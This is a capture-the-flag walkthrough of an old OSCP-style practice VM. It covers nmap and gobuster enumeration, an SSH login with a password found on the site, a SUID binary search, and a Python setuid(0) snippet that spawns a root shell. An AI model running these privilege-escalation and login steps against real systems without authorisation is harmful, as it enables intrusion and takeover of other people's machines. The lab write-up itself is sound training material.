This box is in the list of (old) OSCP like machine, so I am going to try this box.
Require Task:
To get root level access
To get the flag
You can download the machine from here.
Information Gathering:
Kali Linux Machine IP:
Target Machine IP:
Enumerating Services, Versions, Ports
nmap -sC -sV -p- > nmap.log
Since we can see that Apache Web Server is running, therefore, I presume there is there website and we can try robots.txt
No important information was able to find in source code and robots.txt.
I ran gobuster
gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt > gobuster.log

Visit the website

We got password : 12345ted123
I guessed the username: ted
We already have IP address of the machine and from nmap result, we know that the machine runs SSH service.
ssh ted@ (enter the above password) 12345ted123
Privilege Escalation:
At this point, I check kernel version and it appears to me that it is vulnerable, so what I thought to do was, first I will enumerate whether it has any potential suid binaries which could help me to escalated the privilege. If I can’t find any, then will try the kernel exploit.
Let’s find the binaries using the following command.. referred link
find / -perm -u=s -type f 2>/dev/null
I am interested with the python part, because I learned a simple code to escalate to root from google. (apologize for I am not able to recalled from which link).
nano import os os.setuid(0) os.setgid(0) os.system("/bin/bash") python
Yes, we got the root privilege.. now let’s get the flag 🙂